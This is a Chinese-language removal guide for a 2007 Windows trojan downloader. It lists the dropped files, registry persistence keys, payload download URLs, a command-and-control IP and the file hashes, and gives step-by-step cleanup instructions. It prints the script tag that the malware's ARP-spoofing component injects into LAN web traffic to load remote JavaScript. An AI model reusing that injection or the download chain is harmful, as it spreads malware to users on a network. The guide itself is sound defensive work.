|
被劫持到C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面的那个dat文件
下载dl1.exe到临时文件夹 启动IE连接219.152.120.37:80
首先下载http://google.xxxx38.org/update/down.txt看病毒主文件(也就是那个8位随机数字或者字母的文件)是否需要更新 如果需要更新则下载http://google.xxxx38.org/update/update.exe更新自身
然后分别下载http://google.xxxx38.org/update/wow.exe http://google.xxxx38.org/update/mh.exe http://google.xxxx38.org/update/wm.exe http://google.xxxx38.org/update/my.exe http://google.xxxx38.org/update/wl.exe http://google.xxxx38.org/update/zt.exe http://google.xxxx38.org/update/jh.exe http://google.xxxx38.org/update/tl.exe http://google.xxxx38.org/update/1.exe http://google.xxxx38.org/update/2.exe 到program files 文件夹 并把他们命名为ycnt1.exe~ycnt10.exe
具体每个文件的生成物就不一一列举了 不过值得一提的是ycnt9.exe这个木马 他生成C:\WINDOWS\system32\win1ogo.exe 并且该木马试图向局域网内所有用户的80端口每隔5000ms进行arp欺骗 插入<script language=javascript src=http://google.171738.org/ad2.js></script>代码 也就是局域网内所有用户在打开网页时都会被插入这段代码
所有木马文件植入完毕后 生成物如下 C:\WINDOWS\system32\drivers\npf.sys C:\WINDOWS\system32\Kvsc3.dll C:\WINDOWS\system32\msdebug.dll C:\WINDOWS\system32\nwiztlbu.exe C:\WINDOWS\system32\Packet.dll C:\WINDOWS\system32\RemoteDbg.dll C:\WINDOWS\system32\testdll.dll C:\WINDOWS\system32\WanPacket.dll C:\WINDOWS\system32\win1ogo.exe C:\WINDOWS\system32\windds32.dll C:\WINDOWS\system32\winpcap.exe C:\WINDOWS\system32\wpcap.dll C:\WINDOWS\system32\xpdhcp.dll C:\WINDOWS\Kvsc3.exe C:\WINDOWS\testexe.exe C:\Program Files\Common Files\cssrs.exe sreng日志反映如下(在处理一些东西后扫描的这里提前列出)
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] <testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> [] <Kvsc><C:\WINDOWS\Kvsc3.exe> [] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks] <{15BD4111-4111-5BDD-115B-111BD1115BDD}><C:\Program Files\Common Files\Microsoft
Shared\MSINFO\41115BDD.dll> [] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] <Userinit><C:\WINDOWS\system32\userinit.exe,C:\Program Files\Common Files\cssrs.exe,> [N/A] [PID: 1400][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-
2158)] [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testdll.dll] [N/A, ] [C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]
解决办法如下:
1.确定那个8位随机数的dll的名称 这里我们选用winrar确定那个dll的名称 方法是:打开winrar.exe 工具 查看文件 在上面的地址栏中 进入c:\program files\common files\microsoft shared\msinfo目录 (如图1) 我这台被感染的电脑的文件名为41115bdd.dll
2.使用强制删除工具删除那个dll文件 这里我们选用Xdelbox1.2这个软件 具体使用方法见http://hi.baidu.com/teyqiu/blog/item/291690efc3f3b5eece1b3e5a.html(里面有下载地址)
重起机器后 3.恢复被映像劫持的软件 这里我们使用autoruns这个软件 http://www.skycn.com/soft/17567.html 由于这个软件也被映像劫持了 所以我们随便把他改个名字 打开这个软件后 找到Image hijack (映像劫持) 删除除了Your Image File Name Here without a pathSymbolic Debugger for Windows 2000 Microsoft
Corporation c:\windows\system32\ntsd.exe 以外的所有项目
4.此时我们就可以打开sreng了 呵呵 打开sreng 系统修复 高级修复 点击修复安全模式 在弹出的对话框中点击是
5.恢复显示隐藏文件
把下面的 代码拷入记事本中然后另存为1.reg文件 Windows Registry Editor Version 5.00
以下是代码片段:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced" "Text"="@shell32.dll,-30500" "Type"="radio" "CheckedValue"=dword:00000001 "ValueName"="Hidden" "DefaultValue"=dword:00000002 "HKeyRoot"=dword:80000001 "HelpID"="shell.hlp#51105" |
双击1.reg把这个注册表项导入
好了 此时病毒对于我们的所有限制已经解除了 下面就是清除其下载的木马了 重起机器 进入安全模式
打开sreng 启动项目 注册表 删除如下项目 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]下的 <testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> [] <Kvsc><C:\WINDOWS\Kvsc3.exe> []
双击Userinit 把其键值改为C:\WINDOWS\system32\userinit.exe,
在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”, 选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
[CelInDrv / CelInDrv][Stopped/Disabled] <\??\C:\WINDOWS\system32\Drivers\CelInDriver.sys><N/A>
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件
(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定 然后删除 C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.exe C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.dll C:\Documents and Settings\Administrator\Local Settings\Temp\dl1.exe C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dat(随机8位数字字母组合) C:\WINDOWS\Kvsc3.exe C:\WINDOWS\testexe.exe C:\WINDOWS\Help\41115BDD.chm(随机8位数字字母组合) C:\WINDOWS\system32\DirectX\DirectX.ini C:\WINDOWS\system32\drivers\npf.sys C:\WINDOWS\system32\Kvsc3.dll C:\WINDOWS\system32\msdebug.dll C:\WINDOWS\system32\nwiztlbu.exe C:\WINDOWS\system32\Packet.dll C:\WINDOWS\system32\RemoteDbg.dll C:\WINDOWS\system32\testdll.dll C:\WINDOWS\system32\WanPacket.dll C:\WINDOWS\system32\win1ogo.exe C:\WINDOWS\system32\windds32.dll C:\WINDOWS\system32\winpcap.exe C:\WINDOWS\system32\wpcap.dll C:\WINDOWS\system32\xpdhcp.dll C:\WINDOWS\system32\LYLOADER.EXE C:\WINDOWS\system32\LYMANGR.DLL C:\WINDOWS\41115BDD.hlp(随机8位数字字母组合) C:\WINDOWS\Kvsc3.exe C:\WINDOWS\testexe.exe C:\Program Files\Common Files\cssrs.exe C:\Program files\ycnt1.exe~ycnt10.exe(如果有的话) 还是用winrar 删除各个分区下面的autorun.inf和 41115BDD.exe(随机8位数字字母组合) 一定不要双击 最好的方法是用winrar看
注意 其他分区下的autorun.inf和8位随机数的exe一定要删 而且必须用winrar删 不能双击打开 也不能右键打开
5.26 update:刚刚发现病毒主程序更新了 新版本的主程序的相关信息 File: update.exe Size: 36435 bytes MD5: 981A3D735B65F85ADF72EB00CBE7E342 SHA1: F96C27CA5D8380D07C571CB4A5EA95838E1C8B92 CRC32: EB10E247
并且下载的木马也有变化 http://google.xxxx38.org/update/1.exe 有变化 新病毒的版本为2007-5-26-21:50的版本 清除方法已经更新 上一页 [1] [2] [3]
|